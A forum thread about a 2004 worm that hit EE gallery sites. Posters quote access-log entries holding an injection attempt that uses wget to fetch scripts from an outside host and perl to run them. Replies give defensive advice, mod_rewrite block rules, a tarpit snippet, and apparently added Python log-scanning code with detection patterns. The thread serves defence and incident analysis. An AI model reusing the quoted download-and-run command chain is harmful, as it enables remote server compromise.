Worm Attack on EE


MMCM
26th of December 2004 (Sun), 12:21
Hello everybody!

I was on holiday the last few days, and when I returned, I noticed a HUGE increase in accesses to my EE site. The days before I had an average of 30 distinct visitors per day, and on the 24th the count was up to 544!
When I examined the server log, I found A LOT of entries looking like this:

69.44.157.181 - - [25/Dec/2004:03:28:38 +0100] "GET /gallery/photo.php?photo=2251&exhibition=18&pass=public&size=default&lang=ger/index.php?pass=public&lang=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 302 3102 "-" "LWP::Simple/5.801"

Has anybody else noticed that kind of access on their servers? Is EE vulnerable to this attack? What can EE users do about it? After the (successful) attack on Pekka's server I'm VERY sensitive to this kind of problem...

By the way, I'm using Apache on Mandrake Linux...

Martin

Pekka
26th of December 2004 (Sun), 13:25
They try to use the lang variable to run system commands. This will not succeed. Any language that is not installed in EE (three letter code) will give an error message back on the address line, here you get:

http://photography-on-the.net/gallery/photo.php?reverted_to_english_because_language_http://www.visualcoders.net/spy.gif?_is_not_available&exhibition=1&lang=eng


To check if they have succeeded check your /tmp folder for any odd scripts.

I get those attacks many times a day (see below), they seem to try all different variables in all installed PHP scripts to find a way to get in. This www.visualcoders.net stuff seems like a robot-driven attack type. Anyways I'll keep checking if there are any such bugs in EE - I have done some and will do it every day. After what I have experienced with phpbb I can assure I take this extremely seriously. SO FAR I CAN TELL EE IS NOT VULNERABLE TO THIS TYPE OF ATTACK.

But, as with all things, you should take actions to ensure that even UNKNOWN types of attack cannot get through to your server. If you run your own server here are a few basic things:

See http://www.eth0.us/ and especially "Securing temp directories" and installing "APF firewall" and "rkhunter" in the Cpanel section of that site. Also, forbid all outside connections to MySQL (uncomment "skip-networking" in my.cnf) and update PHP to the latest with Register_globals = off. Keep all apps and the kernel up2date. Rename wget to something that only you know.

Do not use phpbb. Or keep an eye for http://secunia.com/search/?search=phpbb&w=0

Those are the basic measures.

Look also in the Apache logs for "wget" or "perl". EXAMPLES FROM MY SITE LOGS:

64.5.44.145 - - [26/Dec/2004:04:03:33 -0600] "GET /forum/showthread.php?t=7283&goto=nextoldest/showthread.php?amp;mode=hybrid&t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 31329
61.8.35.220 - - [26/Dec/2004:04:03:34 -0600] "GET /forum/clientscript/vbulletin_menu.js HTTP/1.1" 304 -

202.57.162.49 - - [26/Dec/2004:04:03:30 -0600] "GET /gallery/photo.php?photo=297&exhibition=2&u=225-1/list.php?exhibition=2&u=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 26460

Note that the exploits always try to RUN a program on your server. Usually this means they download a file with "wget http://foo.com/file.txt" and run it with "perl file.txt". So, keep an eye on your /tmp directory and see if any perl (or txt) files appear there. On my previous server a phpbb bug got a worm, r0nin, onto my temp, and after I cleaned it, the next morning I got several copies of it and other worms (so I closed the server):

hacked /tmp

[root@myserver tmp]# ls -la
total 692
drwxrwxrwt 6 root root 8192 Dec 4 00:59 .
drwxr-xr-x 24 root root 4096 Dec 3 16:59 ..
-rw------- 1 nobody nobody 3266 Nov 23 19:42 169451309441a3e6ff4638e-Z3PO4W
-rw------- 1 nobody nobody 3248 Dec 3 13:17 33874659541b0bbd4044e0-sQ4dJe
-rw------- 1 nobody nobody 3248 Dec 3 13:20 53635743241b0bc7fca0ef-zBEFyf
-rw-r--r-- 1 nobody nobody 20405 Nov 30 14:43 d0s.txt
-rw-r--r-- 1 nobody nobody 20405 Nov 30 14:43 d0s.txt.1
-rw-r--r-- 1 nobody nobody 358 Nov 21 17:36 d.txt
drwxrwxrwt 2 xfs xfs 4096 Dec 3 16:17 .font-unix
drwxrwxrwt 2 root root 4096 Dec 3 16:17 .ICE-unix
drwxr--r-- 2 nobody nobody 4096 Nov 30 16:39 neon
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.1
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:39 neon20.tar.gz.10
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.2
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.3
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.4
-rw------- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.5
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.6
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.7
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.8
-rw-r--r-- 1 nobody nobody 26405 Nov 30 16:38 neon20.tar.gz.9
-rwxrwxrwx 1 nobody nobody 19242 Nov 13 13:44 r0nin
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.1
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.10
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.11
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.12
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.13
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.14
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.2
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.3
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.4
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.5
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.6
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.7
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.8
-rw-r--r-- 1 nobody nobody 19242 Nov 13 13:44 r0nin.9

Now my temp contains some stuff but it's all safe because /tmp is "secured" so that programs cannot be run in it.

[root@myserver tmp]# ls -la
total 22
drwxrwxrwx 6 root root 1024 Dec 26 13:14 .
drwxr-xr-x 21 root root 4096 Dec 22 05:51 ..
drwxrwxrwt 2 xfs xfs 1024 Dec 22 05:52 .font-unix
drwxrwxrwt 2 root root 1024 Dec 22 05:51 .ICE-unix
drwx------ 2 root root 12288 Dec 6 05:23 lost+found
-rw-r--r-- 1 root root 10 Dec 26 13:12 mailstat-localhost.old
-rwxrwxrwx 1 root root 18 Dec 6 05:55 script
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10642
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10668
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10694
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10720
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10746
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10772
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10798
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10824
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10850
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10876
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10902
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10928
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10954
-rw------- 1 root root 0 Dec 17 15:17 .shtool.10980
-rw------- 1 root root 0 Dec 17 15:17 .shtool.11006

"script" above is my "protection test" script containing a "ls -la" command - as my /tmp is protected it can not be run at all so all is well.
If you suspect a file, seek its filename on Google - you will find what it is.

MMCM
26th of December 2004 (Sun), 15:35
Thanks very much for the quick reply!

Even if I secured the server well, the attack destroyed the statistics of the server. The photo view counter is totally useless now. Before the attack, the highest counter was about 40, now it's 1100. In the last two hours, since I started this thread, I have had another 3000 photo views. Somebody at wordpress.com (see http://wordpress.org/support/7/19285) suggested blocking the worm by modifying the php-script or using .htaccess. This would at least prevent it from generating fake photo views. I am already thinking of parsing the access_log for photos viewed by the worm and reducing the view count of the affected photos in the database. Another option would be to restore the last database backup, but then normal photo views would be reset too.
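Pekka's advice above is to grep the Apache logs for "wget" or "perl", and MMCM wants to parse the access_log for the photos the worm touched. As an added example (my code, not anything from this thread or from EE), here is a small Python scanner that does both: it pulls the query string out of each request line, decodes each parameter value, flags values that carry a shell tool name or a remote URL (the two things every line quoted in this thread has in common), tallies source addresses, and lists the photo ids whose view counters were inflated. The log lines inside the block are constructed, with documentation addresses and *.invalid hostnames; the indicator patterns are my own choice.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample of Apache access-log lines modelled on the ones posted in
# the thread. Addresses are documentation ranges and hosts are *.invalid
# placeholders; none of this is real infrastructure.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Dec/2004:03:28:38 +0100] "GET /gallery/photo.php?photo=2251&exhibition=18&pass=public&lang=ger/index.php?lang=http://host.invalid/spy.gif?&cmd=cd%20/tmp;wget%20host.invalid/spybot.txt;perl%20spybot.txt HTTP/1.1" 302 3102 "-" "LWP::Simple/5.801"
192.0.2.11 - - [25/Dec/2004:03:29:01 +0100] "GET /gallery/photo.php?photo=12&exhibition=1&lang=eng HTTP/1.1" 200 26460 "-" "Mozilla/5.0"
192.0.2.12 - - [26/Dec/2004:04:03:30 -0600] "GET /forum/showthread.php?t=7283&goto=nextoldest/showthread.php?t=http://host.invalid/spy.gif?&cmd=cd%20/tmp;wget%20host.invalid/worm1.txt;perl%20worm1.txt HTTP/1.1" 200 31329
192.0.2.13 - - [26/Dec/2004:04:03:34 -0600] "GET /forum/clientscript/vbulletin_menu.js HTTP/1.1" 304 -
"""

# Client address, timestamp and request target of a common/combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Indicators checked against each decoded parameter value. The word boundaries
# keep a harmless value such as "wewgetcsd" from being reported.
INDICATORS = {
    "shell tool in value": re.compile(r"\b(wget|curl|perl|lynx|fetch)\b", re.IGNORECASE),
    "remote URL in value": re.compile(r"\b(https?|ftp)://", re.IGNORECASE),
}


def parse_line(line):
    """Split one log line into ip, timestamp, path and raw query; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path, "query": parts.query}


def split_query(query):
    """Yield (name, decoded value) pairs, splitting only on '&' so ';' inside a value survives."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def suspicious_params(query):
    """Map parameter name -> list of indicator names whose pattern matched its decoded value."""
    hits = {}
    for name, value in split_query(query):
        reasons = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if reasons:
            hits[name] = reasons
    return hits


def scan(log_text):
    """Return (flagged request records, flagged-request count per source address)."""
    flagged, by_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["query"])
        if hits:
            rec["hits"] = hits
            flagged.append(rec)
            by_ip[rec["ip"]] += 1
    return flagged, by_ip


def affected_photos(flagged):
    """Count flagged requests per photo id on photo.php: the counters that would need correcting."""
    photos = Counter()
    for rec in flagged:
        if rec["path"].endswith("/photo.php"):
            for name, value in split_query(rec["query"]):
                if name == "photo" and value.isdigit():
                    photos[value] += 1
    return photos


if __name__ == "__main__":
    flagged, by_ip = scan(SAMPLE_LOG)
    for rec in flagged:
        print(rec["ip"], rec["ts"], rec["path"], rec["hits"])
    print("flagged requests per source:", dict(by_ip))
    print("photo counters to correct:", dict(affected_photos(flagged)))
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents. Note that the first request is flagged twice over: the lang value carries a remote URL (the inclusion attempt) and the cmd value carries the download-and-run chain, which is exactly the pair of signals worth alerting on regardless of which script or parameter a particular scanner picks.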

Pekka
26th of December 2004 (Sun), 17:51
I would not worry about counters...

It would be nice to use mod_rewrite in a .htaccess which would see if the URL had the string "wget" and redirect it to a 404 error page or to a page with PHP

<?php
// Tarpit: emit one line ending every 13 seconds for a very long time so the
// scanning client stays blocked waiting for this response to finish.
for ($n = 0; $n <= 10000000; $n++) {
    sleep(13);
    print "\n\r";
    flush(); // push the bytes to the client instead of leaving them in the output buffer
}
?>

that would tie the robot up waiting for an answer for a long time :)
I suck with regexp but I'll see about that: http://httpd.apache.org/docs-2.0/misc/rewriteguide.html

If you know how to code it post it here.

Pekka
26th of December 2004 (Sun), 19:09
I got it. Here is a rewriterule for .htaccess (if you have mod_rewrite installed) which will redirect all requests with string "wget" in parameter section to google (use any site you like, or local address).

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?

You can see how it works with e.g. http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&u=33-2?wget
or
http://photography-on-the.net/gallery/photo.php?wget=12378?photo=201&exhibition=1&u=33-2
or
http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&something=wewgetcsd&u=33-2

It's now on for the whole POTN site...
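As an added example (my code, not Pekka's and not part of EE), the following Python emulates how the two RewriteCond lines above decide on a request, so the rule can be checked without touching a live server. Apache runs each pattern as an unanchored regular-expression search over the raw query string and, with [OR] between them, fires the RewriteRule when either one matches; the three demo URLs Pekka lists plus a normal gallery request are run through that logic. A word-boundary variant of the patterns is included as my own suggestion, to show how the third URL (wewgetcsd) would then be served rather than redirected while the worm's own cmd=...;wget%20... query still is.

```python
import re
from urllib.parse import urlsplit

# Pekka's two RewriteCond patterns. Apache applies each as an unanchored regex
# search over %{QUERY_STRING}, the raw (still percent-encoded) query string.
PEKKA_PATTERNS = [r"wget", r"echr\("]

# Stricter variant (my suggestion, not from the thread): word boundaries so that
# an ordinary value that merely contains the letters "wget" is not redirected.
STRICT_PATTERNS = [r"\bwget\b", r"\bechr\("]

# The demo URLs Pekka posted, plus one ordinary gallery request for contrast.
DEMO_URLS = [
    "http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&u=33-2?wget",
    "http://photography-on-the.net/gallery/photo.php?wget=12378?photo=201&exhibition=1&u=33-2",
    "http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&something=wewgetcsd",
]
NORMAL_URL = "http://photography-on-the.net/gallery/photo.php?photo=201&exhibition=1&u=33-2"

# Constructed query in the shape of the worm's requests (placeholder host).
WORM_URL = "http://host.invalid/gallery/photo.php?photo=1&lang=x&cmd=cd%20/tmp;wget%20host.invalid/a.txt;perl%20a.txt"


def rewrite_cond_matches(url, patterns=PEKKA_PATTERNS):
    """Emulate 'RewriteCond %{QUERY_STRING} p1 [OR] RewriteCond %{QUERY_STRING} p2'.

    True when any pattern is found somewhere in the raw query string, which is
    when the following RewriteRule would fire.
    """
    query = urlsplit(url).query
    return any(re.search(p, query) is not None for p in patterns)


def decide(url, patterns=PEKKA_PATTERNS):
    """'redirect' if the rule would send the request away, otherwise 'serve'."""
    return "redirect" if rewrite_cond_matches(url, patterns) else "serve"


if __name__ == "__main__":
    print("pekka    strict   url")
    for url in DEMO_URLS + [NORMAL_URL, WORM_URL]:
        print(f"{decide(url):8s} {decide(url, STRICT_PATTERNS):8s} {url}")
```

The RewriteRule in the thread ends with a bare "?" after the target URL, which tells mod_rewrite to drop the original query string from the redirect; otherwise the matched query would be appended to the Google URL. Whichever pattern set is used, the redirect only stops the bot from reaching the PHP script; it does nothing for requests that do not carry one of these two strings, so the /tmp and register_globals measures from earlier in the thread still matter.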

pplfilho
27th of December 2004 (Mon), 10:51
RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?



Pekka,

I was following this thread and I think this is a good thing to do. I am not a webmaster wizard but I got it working in my site.

thanks,

[]s
Pedro Luz Cunha
www.pedroluz.com

stevehof
27th of December 2004 (Mon), 12:26
OK, I'm in the same boat. I tried to copy-paste Pekka's htaccess.txt code into my existing 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how do you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... here's the content (minus quotes) of my current htaccess.txt file.

"php_value max_execution_time 180

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?"

Pekka
27th of December 2004 (Mon), 14:08
OK, I'm in the same boat. I tried to copy-paste Pekka's htaccess.txt code into my existing 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how do you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... here's the content (minus quotes) of my current htaccess.txt file.

"php_value max_execution_time 180

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?"

Looks just like mine. Do you have mod_rewrite installed in your Apache? Above won't work without it.

pplfilho
27th of December 2004 (Mon), 15:12
OK, I'm in the same boat. I tried to copy-paste Pekka's htaccess.txt code into my existing 1.5RC4 htaccess.txt file but I can't seem to make it redirect....how do you actually get this thing to work..HELP ...PLEASE...my bandwidth is about 6 gigs a day since this attack.... here's the content (minus quotes) of my current htaccess.txt file.


Well, what I did is I saved the file in my home directory on my server as '.htaccess' (dot htaccess). But I had to remove the first line (php_value max_execution_time 180) because I was getting a Server Error, and without it, it worked fine.

[]s
Pedro Luz Cunha
www.pedroluz.com

stevehof
27th of December 2004 (Mon), 18:17
Got it working. I didn't see the file naming convention the first time around...

THANKS PEKKA!!!!

pplfilho
28th of December 2004 (Tue), 10:28
Hello All,

I just read at www.pandasoftware.com that Santy.B is back again in a new variation. Be aware.

[]s
Pedro Cunha
www.pedroluz.com

blulegend
30th of May 2005 (Mon), 00:58
I keep getting major bandwidth usage from MSNBot. Is there a way to block these useless hits without manually blocking the IP each time?

calvorn
31st of May 2005 (Tue), 17:56
I can't find any evidence of a worm (nothing in the temp folder) but my gallery just went down after two years of constant use. The error message you get when you try to access the gallery is: "Resource limit exceeded."

My ISP says:

"It is not an issue caused by some kind of hacking activity. It seems that there is something wrong with the gallery script you are using. If this is a third-party script, please consider upgrading to the newest stable version available. If this is a script that has been written by you or for you exclusively, please check its code or consult your programmer on this matter. The script is making too many instances of the PHP pages it is loading and at a certain point it is starting to overload the server. Then the automatic server protection mechanisms are triggered and no more processes are allowed to be initiated under your hosting account."

Seems strange this would happen all of a sudden. I am using 1.5RC4. I am not at home and will reupload the scripts when I get back tomorrow and see if that does it, but I would sure like to know what's happening.

The url is www.calvorn.com/gallery

Anybody have any ideas?

Thanks.

Cal

Pekka
31st of May 2005 (Tue), 18:07
If you have e.g. a VPS (Virtuozzo) server it may give messages like that when predefined server resource limits are eaten. That could be disk space, mysql disk space, files on disk, dozens of limit triggers....

That is definitely not an EE message; you can search the source code and you'll see there is no such message.

Disk space might be spent if you have never cleaned your EE messages or Uncookied data. In that case you could just erase those tables.

Can you get to editor? Can you open PHPmyadmin or any mysql admin tool?

calvorn
31st of May 2005 (Tue), 19:48
Pekka:

I know it's not an EE message but my ISP says

"The script is making too many instances of the PHP pages it is loading and at certain point it is starting to overload the server. Then the automatic server protection mechanisms are triggered and no more processes are allowed to be initiated under your hosting account."

I have been all through the directories and don't see any files that have been changed or uploaded recently. I can't get to myPHPadmin because it is accessed via the control panel which is a PHP page. I have disabled access to the gallery directory and hopefully all those PHP processes will die and I can see what's going on.

Thanks.

Cal

calvorn
1st of June 2005 (Wed), 19:46
After going around and around with my ISP they finally admitted their System Administrator had made some changes to the server's configuration file and that's what was causing the errors. Nothing to do with EE or a worm.

I use ICDSoft and have always been pleased with them (I have 12 sites currently hosted with them) but I find the support people try to put the blame on the customer and you have to fight with them to get them to consider that it might be their problem. I believe they use a third party for tech support.

Cal

Ed Rotberg
6th of June 2006 (Tue), 10:49
I got it. Here is a rewriterule for .htaccess (if you have mod_rewrite installed) which will redirect all requests with string "wget" in parameter section to google (use any site you like, or local address).

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?



OK, I've just picked up on this discussion and I have a couple of questions. First, which .htaccess.txt file? The one in the gallery folder or the one in our "hidden" folder? I've added it to both for the time being...

Secondly, how do I determine if I have mod_rewrite on? I'm a novice at a bunch of this stuff, but I'd like to have my site as secure as possible. I did find a mod_rewrite.so file in the Apache "modules" directory, and a few xml/html files in the manual directory, but I don't know anything else about this.

Thanks in advance,

= Ed =

pplfilho
15th of June 2006 (Thu), 21:38
Hello All,

About the recent 'attack' on EE users, I have had no problems at all, thanks to my server configuration. But I decided to use the same trick Pekka advised us in topic
http://photography-on-the.net/forum/showthread.php?t=51694

where it says:

RewriteEngine on
RewriteCond %{QUERY_STRING} wget [OR]
RewriteCond %{QUERY_STRING} echr\(
RewriteRule .* http://www.google.com/index.html?


I just included another line:
'RewriteCond %{QUERY_STRING} toorot'

and for RewriteRule I sent it to nowhere, not to Google.

It seems to work. Anything wrong with it? I mean, does it work all right?

[]s
:rolleyes:???

mvrekum
16th of June 2006 (Fri), 01:34
Shouldn't that be:
'RewriteCond %{QUERY_STRING} toroot'

pplfilho
16th of June 2006 (Fri), 16:57
Shouldn't that be:
'RewriteCond %{QUERY_STRING} toroot'

Yes, a slight mistake. ;-)

[]s

Ed Rotberg
21st of June 2006 (Wed), 10:09
I'd really appreciate it if someone would respond here who understands this stuff. Am I supposed to add the RewriteEngine lines to the .htaccess file in my hidden directory, or perhaps my main gallery directory? Or possibly my root directory for my web pages? Sorry to be so dull on this, but it's just not clear to me. Perhaps I should add it to all 3 places?? :(

= Ed =

OK, I've just picked up on this discussion and I have a couple of questions. First, which .htaccess.txt file? The one in the gallery folder or the one in our "hidden" folder? I've added it to both for the time being...

Secondly, how do I determine if I have mod_rewrite on? I'm a novice at a bunch of this stuff, but I'd like to have my site as secure as possible. I did find a mod_rewrite.so file in the Apache "modules" directory, and a few xml/html files in the manual directory, but I don't know anything else about this.

Thanks in advance,

= Ed =

mvrekum
22nd of June 2006 (Thu), 01:15
...Or possibly my root directory for my web pages? ...

Yep, that's it.